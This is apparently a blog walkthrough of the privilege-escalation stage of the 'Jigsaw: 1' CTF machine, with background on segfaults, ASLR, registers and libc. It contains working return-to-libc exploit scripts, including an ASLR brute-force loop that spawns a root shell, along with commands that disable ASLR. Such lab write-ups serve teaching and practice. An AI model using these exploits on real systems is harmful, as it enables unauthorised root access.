Exploiting Buffer Overflow Using Return to Libc

Introduction

Recently, while working through the “Jigsaw: 1” machine from Vulnhub.com, I was presented with a buffer overflow challenge at the privilege escalation stage. While researching how it could be exploited, I came across an interesting method of buffer overflow exploitation called “Return to Libc”. Many online blogposts explain how this method can be leveraged to gain a shell from a buffer overflow vulnerability, but my Google skills were not able to find one that explained each step in detail.

So, in this blogpost I aim to piece together all the information that I collected. Buffer overflow is itself a vast topic, so covering every aspect of it is not possible in one blogpost, but I will try to cover most of the areas relevant to the “Return to Libc” method of exploitation.

Before proceeding: this blogpost expects you to know the basics of what a buffer overflow is, how it occurs, and basic buffer overflow exploitation. Also, a spoiler alert for the privilege escalation part of the CTF machine “Jigsaw: 1”. If you plan to do the CTF machine completely on your own and do not want it spoiled by my blogpost, stop reading now.

The following are the topics that I’ve shortlisted which will be covered in this blogpost:

  • What is a segmentation fault error?
  • What is ASLR protection?
  • How does the stack grow?
  • What are the EBP, ESP and EIP registers?
  • How does Linux use the ring architecture?
  • What is the role of libc in Linux?
  • What are system calls?

Without wasting any more words, let’s look at the exploitation. All the above-mentioned topics are covered afterwards, under Key Concepts.

To set the scene: we have a low-privileged shell on the victim machine, along with an ELF executable named game3 that is vulnerable to a buffer overflow. This binary is our ticket to a root shell on the victim machine.

Upon running game3 we see that it accepts input, and upon submitting a long input it throws a segmentation fault error.

At this point it was almost clear that this was a buffer overflow vulnerability and that we would need to exploit it to possibly gain root access on the server. That requires some debugging capability, but unfortunately no debugging tool was present on the machine. It was also discovered that ASLR was enabled on the machine, but the addresses changed only slightly between runs, so buffer overflow exploitation might still be possible.

The next task was to transfer the game3 file to our local system. After some trial and error, SFTP was used successfully to transfer the file. Next, a 100-character pattern was constructed using pattern_create.rb.

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 100

The game3 program was run under gdb with the 100-character pattern as input. It crashed with EIP set to 0x63413563, a value that sits at offset 76 in the pattern.
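The mapping from the value found in EIP to an offset can also be reproduced by hand. The following is a minimal Python 3 sketch, assuming the pattern follows the usual uppercase/lowercase/digit triplet scheme (Aa0Aa1Aa2...). The function names cyclic_pattern and pattern_offset are made up for this illustration and are not part of Metasploit.

```python
import struct
from itertools import product
from string import ascii_lowercase, ascii_uppercase, digits


def cyclic_pattern(length):
    """Build an Aa0Aa1Aa2... style pattern of the requested length."""
    triplets = []
    # product() varies the last element fastest, so the digit changes first.
    for upper, lower, digit in product(ascii_uppercase, ascii_lowercase, digits):
        if len(triplets) * 3 >= length:
            break
        triplets.append(upper + lower + digit)
    return "".join(triplets)[:length]


def pattern_offset(eip_value, length=100):
    """Return the position of the 4 bytes found in EIP, or -1 if absent."""
    # x86 is little-endian, so the register value is stored byte-reversed.
    needle = struct.pack("<I", eip_value).decode("ascii")
    return cyclic_pattern(length).find(needle)


print(pattern_offset(0x63413563))
```

Here 0x63413563 unpacks to the bytes “c5Ac”, which begin at position 76 of the pattern.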

So now we knew that the saved return address is overwritten starting at offset 76. The next step was to control EIP, so our first payload was constructed as follows.

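# Python 2
buff = "A" * 76   # padding up to the saved return address
buff += "BBBB"    # 4 bytes that should land in EIP (0x42424242)
print buff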

Running this POC under gdb shows EIP overwritten with 0x42424242 (“BBBB”), so we gained EIP control successfully.
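Why 76 bytes of padding followed by “BBBB” hands over EIP can be illustrated with a toy model. This is only a Python 3 sketch: the frame is modelled as a flat byte array, the original return address 0x08048500 is a made-up value, and the unchecked copy stands in for whatever copy routine game3 actually uses.

```python
import struct

BUFFER_TO_RET = 76  # distance from the start of the input to the saved return address


def simulate_overflow(user_input, frame_size=BUFFER_TO_RET + 4):
    """Copy input into a toy stack frame without bounds checking, then 'ret'."""
    # Frame before the copy: zeroed locals, then a legitimate (hypothetical)
    # saved return address in the last 4 bytes.
    frame = bytearray(frame_size)
    frame[BUFFER_TO_RET:BUFFER_TO_RET + 4] = struct.pack("<I", 0x08048500)
    # Unchecked copy: nothing stops the input from running past the locals.
    frame[:len(user_input)] = user_input
    # 'ret' pops the saved return address into EIP.
    (eip,) = struct.unpack("<I", frame[BUFFER_TO_RET:BUFFER_TO_RET + 4])
    return eip


print(hex(simulate_overflow(b"hello")))
print(hex(simulate_overflow(b"A" * 76 + b"BBBB")))
```

A short input leaves the saved return address alone, while the 80-byte input replaces it with the four “B” bytes.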

Next, our task was to gain shell access using this buffer overflow. We first construct the POC for our local system and, once it works there, construct the POC for the CTF machine. For this we use the “Return to libc” method of exploitation, in which the overwritten return address points at a function that already exists in libc (here system()) instead of at injected shellcode.

Constructing POC and Gaining shell on local system

Here we leverage libc’s system() function to gain a shell on our local system first.

For constructing a working POC we would require 4 addresses/offsets:

  • Base Address
  • System Address
  • Exit Address
  • /bin/sh Address

Before acquiring the addresses, we would first turn off the ASLR protection on our local system.

echo 0 > /proc/sys/kernel/randomize_va_space

To acquire the base address, we can run the ldd command on our game3 binary. For the system and exit offsets, we can run readelf on the libc.so.6 library and grep for system and exit respectively. Lastly, we can run the strings command on the same library and grep out the /bin/sh offset. These commands are as follows:

ldd game3
strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit
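Since grep can match more than one symbol containing “system” or “exit”, it helps to pick out the exact name. The following Python 3 sketch shows one way to extract the values from the command output. The two sample lines are illustrative only (real output differs per system), and the helper names are hypothetical.

```python
import re

# Illustrative sample lines only; real output differs per system.
LDD_LINE = "\tlibc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7dd4000)"
READELF_LINE = "  1537: 0003eb40    55 FUNC    WEAK   DEFAULT   13 system@@GLIBC_2.0"


def libc_base_from_ldd(line):
    """Return the load address ldd prints in parentheses for libc.so.6."""
    match = re.search(r"libc\.so\.6 => \S+ \((0x[0-9a-fA-F]+)\)", line)
    return int(match.group(1), 16) if match else None


def symbol_offset_from_readelf(line, symbol):
    """Return the Value column if the line describes exactly this symbol."""
    fields = line.split()
    # Columns: Num, Value, Size, Type, Bind, Vis, Ndx, Name
    if len(fields) == 8 and fields[7].split("@")[0] == symbol:
        return int(fields[1], 16)
    return None


print(hex(libc_base_from_ldd(LDD_LINE)))
print(hex(symbol_offset_from_readelf(READELF_LINE, "system")))
```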

Thus, the following are the addresses that we were able to collect:

  • Base Address = 0xb7dd4000
  • /bin/sh offset = 0x0017eaaa
  • System offset = 0x0003eb40
  • Exit offset = 0x00031b40

Once we have these values, we can construct our payload to gain a shell on our local system. Before we do that, a little background on why we need them. User space programs in Linux rely on system calls to interact with kernel space. Libc is the standard C library; it contains the functions that programs use, including the wrappers that issue system calls on their behalf. Because game3 is linked against libc, the whole library is mapped into its address space, including functions that game3 itself may never call, such as system().

First we found the base address at which libc is loaded for our binary (game3). Next we found the offsets of system(), exit() and the string “/bin/sh” inside the library file. An offset is the distance from the base address, so adding the base address to an offset gives the actual address at which the function or string resides in memory.

The payload places these three addresses directly after the 76 bytes of padding. The address of system() overwrites the saved return address, so the vulnerable function “returns” into system(). The next word is what system() treats as its own return address, which we point at exit() so that the program terminates cleanly once the shell is closed. The word after that is the first argument to system(), which is the address of “/bin/sh”. Of course, this is just a short summary of how the POC below gives us a shell.

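# Python 2
import struct

base = 0xb7dd4000    # libc base address reported by ldd
binsh = 0x0017eaaa   # offset of the "/bin/sh" string in libc
syst = 0x0003eb40    # offset of system()
exit = 0x00031b40    # offset of exit()

# Absolute addresses packed as 32-bit little-endian words
syst_final = struct.pack("<I", base + syst)
exit_final = struct.pack("<I", base + exit)
binsh_final = struct.pack("<I", base + binsh)

buff = "A" * 76      # padding up to the saved return address
buff += syst_final   # new return address: system()
buff += exit_final   # return address seen by system(): exit()
buff += binsh_final  # first argument to system(): "/bin/sh"
print buff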
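To double-check what ends up on the stack, the payload can be built and then unpacked again. This is a Python 3 sketch using the local addresses listed above; build_payload and describe are hypothetical helper names, not part of the original POC.

```python
import struct


def build_payload(base, system_off, exit_off, binsh_off, padding=76):
    """Padding, then system(), exit() and "/bin/sh" as little-endian words."""
    words = (base + system_off, base + exit_off, base + binsh_off)
    return b"A" * padding + struct.pack("<3I", *words)


def describe(payload, padding=76):
    """Unpack the three words that follow the padding."""
    system_addr, exit_addr, binsh_addr = struct.unpack(
        "<3I", payload[padding:padding + 12]
    )
    return {"system": system_addr, "exit": exit_addr, "binsh": binsh_addr}


payload = build_payload(0xb7dd4000, 0x0003eb40, 0x00031b40, 0x0017eaaa)
for name, address in describe(payload).items():
    print("%-6s -> 0x%08x" % (name, address))
```

In Python 3 the payload is a bytes object, so it would be written out with sys.stdout.buffer.write(payload) rather than print.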

Running the above exploit gave us the sh shell on our local system.

Constructing POC and Gaining shell on the CTF

Using the same concept, we first extracted the required addresses/offsets on the CTF machine. The values we obtained were as follows:

  • Base Address = 0xb75e0000
  • System Offset = 0x00040310
  • Exit Offset = 0x00033260
  • /bin/sh Offset = 0x00162d4c

Next, we construct our final exploit code for gaining a shell on the CTF machine. The only catch this time is that ASLR is enabled there, so we cannot expect libc to be loaded at the same base address every time game3 runs. Therefore, we run the exploit in a loop with a fixed guess for the base address until libc happens to be loaded at that address and we gain a root shell.

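# Python 2
from subprocess import call
import struct

base = 0xb75e0000    # libc base address gathered on the CTF machine
syst = 0x00040310    # offset of system()
exit = 0x00033260    # offset of exit()
binsh = 0x00162d4c   # offset of the "/bin/sh" string

syst_final = struct.pack("<I", base + syst)
exit_final = struct.pack("<I", base + exit)
binsh_final = struct.pack("<I", base + binsh)

buf = "A" * 76
buf += syst_final
buf += exit_final
buf += binsh_final

# Retry until ASLR happens to load libc at the guessed base address
i = 0
while i < 50:
    print "Try: %s" % i
    print buf
    i += 1
    ret = call(["/bin/game3", buf])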

Finally, we ran our code and after some iterations, a root shell was gained successfully.
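How many iterations to expect depends on how many different base addresses ASLR can choose from. As a rough Python 3 sketch, assume libc can land on 2^bits equally likely base addresses. The 8 bits used below is an assumption for illustration, not a value measured on the CTF machine.

```python
def success_probability(tries, entropy_bits):
    """Chance that at least one of `tries` runs hits the guessed base address."""
    per_try = 1.0 / (2 ** entropy_bits)
    return 1.0 - (1.0 - per_try) ** tries


def expected_tries(entropy_bits):
    """Average number of runs before the first hit (geometric distribution)."""
    return 2 ** entropy_bits


ASSUMED_BITS = 8  # assumption for illustration only
for tries in (50, 256, 1000):
    chance = success_probability(tries, ASSUMED_BITS)
    print("%4d tries -> %.1f%% chance of a hit" % (tries, chance * 100))
print("expected tries:", expected_tries(ASSUMED_BITS))
```

Under this assumption a fixed cap on the number of attempts may not be enough, so the loop limit is worth raising if no shell appears.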

Key Concepts

What is a segmentation fault (core dump) error?

A segmentation fault is a runtime error raised when a program tries to access a memory location that it is not allowed to access, for example an address that was never mapped into the process or a region it may not write to. The operating system defines which memory regions a process may access, and by default it terminates a process that steps outside them.
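A segmentation fault can be provoked on purpose to see how the operating system reports it. The Python 3 sketch below assumes a Linux (POSIX) system: it starts a child interpreter that reads from address 0 through ctypes and then inspects the exit status. The helper name run_and_report is hypothetical.

```python
import signal
import subprocess
import sys

# Reading a C string from address 0 touches memory that is not mapped.
CRASHING_SNIPPET = "import ctypes; ctypes.string_at(0)"


def run_and_report(snippet):
    """Run a snippet in a child interpreter and return its exit status."""
    result = subprocess.run(
        [sys.executable, "-c", snippet],
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
    )
    return result.returncode


status = run_and_report(CRASHING_SNIPPET)
# On POSIX a negative status -N means the child was killed by signal N.
if status == -signal.SIGSEGV:
    print("child was killed by SIGSEGV (segmentation fault)")
else:
    print("child exited with status", status)
```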

Further Reading

http://web.mit.edu/10.001/Web/Tips/tips_on_segmentation.html

https://www.geeksforgeeks.org/core-dump-segmentation-fault-c-cpp/

What is ASLR protection?

ASLR is an abbreviation of Address Space Layout Randomization. It is used to make memory corruption bugs such as buffer overflows harder to exploit. Many buffer overflow exploits rely on knowing the addresses at which code and data are loaded. Once attackers know these addresses, they can use a buffer overflow to hijack the EIP register and point it at an address of their choice, finally leading to escalated access on the operating system or other intended outcomes. What ASLR does is load regions such as the stack, the heap and shared libraries at a different random address each time a program is executed. Of course, there are other protection techniques against buffer overflow exploitation, but ASLR is what is relevant to this blogpost.

In modern kernels the randomize_va_space value is set to 2 by default, which randomizes the stack, the memory-mapped regions (including shared libraries) and the heap. The value can also be set to 1 to enable ASLR without heap randomization, which matters because older kernels might not support the value 2. To disable ASLR, the value can be set to 0:

echo 0 > /proc/sys/kernel/randomize_va_space

The sysctl command can also be used to do the same:

sysctl -w kernel.randomize_va_space=0
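Before relying on fixed addresses, it is worth checking which setting is currently active. A small Python 3 sketch, assuming a Linux system that exposes the file used above; the descriptions are a summary and describe_aslr and current_aslr are hypothetical helper names.

```python
from pathlib import Path

ASLR_PATH = Path("/proc/sys/kernel/randomize_va_space")

MEANING = {
    0: "disabled: addresses stay the same between runs",
    1: "enabled: stack and memory-mapped regions are randomized",
    2: "enabled: as 1, plus heap randomization",
}


def describe_aslr(value):
    """Translate a randomize_va_space value into a short description."""
    return MEANING.get(value, "unknown setting")


def current_aslr(path=ASLR_PATH):
    """Read the current setting, or return None if it is unavailable."""
    try:
        return int(path.read_text().strip())
    except (OSError, ValueError):
        return None


value = current_aslr()
print("randomize_va_space =", value, "->", describe_aslr(value))
```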

Further Reading

https://searchsecurity.techtarget.com/definition/address-space-layout-randomization-ASLR

https://www.howtogeek.com/278056/what-is-aslr-and-how-does-it-keep-your-computer-secure/

How does the stack grow?

The direction in which the stack grows depends on the processor architecture a program is running on. For the sake of this blogpost, and without deviating much from our topic, we only need to keep in mind that on x86 the stack grows downwards. This means that the base of the stack has the highest memory address, and as data is pushed onto the stack, the top of the stack moves to lower memory addresses.

A push instruction is used to add data to the stack and a pop instruction is used to remove data from it. A very basic representation of the stack is shown in the image below.
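The downward growth can also be modelled in a few lines of Python 3. This is a toy sketch: the starting address 0xBFFFF000 is an arbitrary assumption and every slot is taken to be 4 bytes wide, as on 32-bit x86.

```python
class ToyStack:
    """Model of a stack that grows towards lower addresses."""

    def __init__(self, base=0xBFFFF000):
        self.esp = base      # top of the stack; starts at the base
        self.memory = {}     # address -> 32-bit value

    def push(self, value):
        self.esp -= 4        # the top moves DOWN before the value is stored
        self.memory[self.esp] = value

    def pop(self):
        value = self.memory.pop(self.esp)
        self.esp += 4        # the top moves back UP after the value is read
        return value


stack = ToyStack()
for item in (0x11111111, 0x22222222):
    stack.push(item)
    print("pushed 0x%08x, ESP = 0x%08x" % (item, stack.esp))
print("popped 0x%08x, ESP = 0x%08x" % (stack.pop(), stack.esp))
```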

Further Reading

https://stackoverflow.com/questions/664744/what-is-the-direction-of-stack-growth-in-most-modern-systems

What are EBP, ESP and EIP registers?

EBP, ESP and EIP are 32-bit x86 registers that hold memory addresses. EBP and ESP point to positions on the stack, while EIP points into the program’s code.

EBP stands for Extended Base Pointer and, as the name states, it holds the address of the base of the current function’s stack frame. The base is the highest memory address in that frame.

ESP stands for Extended Stack Pointer and always holds the address of the top of the stack. The top of the stack is the lowest memory address in use on the stack.

EIP stands for Extended Instruction Pointer and always holds the address of the next instruction to be executed. When a function returns, the saved return address is popped from the stack into EIP, which is why overwriting that saved address gives us control of EIP.

Further Reading

https://payatu.com/understanding-stack-based-buffer-overflow/

Linux’s Usage of Ring Architecture.

It is important to know that x86 CPUs are built around the ring architecture shown below, with four privilege levels numbered 0 to 3. Ring 0 is used for kernel space and ring 3 for user space. Rings 1 and 2 are not utilized by Linux and therefore we won’t be discussing them here.

Each ring has its own set of privileges and is therefore allowed or not allowed to perform certain operations. Ring 0, the kernel space, has the highest privileges and is able to perform any task, whereas the user space in ring 3 has the lowest privileges. As the name suggests, this is the space where the programs run by any user of the operating system operate.

To perform privileged activities, such as accessing files, devices or the memory of other processes, user space must use system calls to ask kernel space to perform these operations. System calls basically act as an API between user space and kernel space, through which a user space program can request that the kernel perform certain tasks. Of course, the operating system also defines a set of permissions that determine which of these requests the kernel will carry out for a given user.

Further Reading

https://stackoverflow.com/questions/18717016/what-are-ring-0-and-ring-3-in-the-context-of-operating-systems

Role of Libc in Linux.

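Now that we know what system calls are, we can get an overview of what libc is. Libc is the standard C library and contains numerous C functions. Many (but not all) of these functions are wrappers around system calls, such as write() and execve(), while others, such as strcpy(), run entirely in user space. The system() function that our exploit returns into is one of these library functions: it runs the command it is given through /bin/sh. Thus, for this topic all we need to know is that libc gives a program the capability to use system calls through its library of functions. On Debian-based Linux systems the 32-bit version of this library can be found at the location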

/lib/i386-linux-gnu/libc.so.6
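The difference between a pure user space function and a system call wrapper can be seen by calling libc directly. The Python 3 sketch below assumes a Unix-like system where ctypes.CDLL(None) exposes the C library already loaded into the interpreter; strlen() is used as the user space example and getpid() as the system call wrapper.

```python
import ctypes
import os

# Passing None opens the symbols already loaded into this process,
# which on Linux includes libc.
libc = ctypes.CDLL(None)

# strlen() runs entirely in user space: it only walks the bytes of a string.
libc.strlen.argtypes = [ctypes.c_char_p]
libc.strlen.restype = ctypes.c_size_t

# getpid() is a thin wrapper that asks the kernel for the process ID.
libc.getpid.argtypes = []
libc.getpid.restype = ctypes.c_int

length = libc.strlen(b"/bin/sh")
pid = libc.getpid()
print("strlen('/bin/sh') =", length)
print("getpid() via libc =", pid, "| os.getpid() =", os.getpid())
```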

Further Reading

https://stackoverflow.com/questions/11372872/what-is-the-role-of-libcglibc-in-our-linux-app
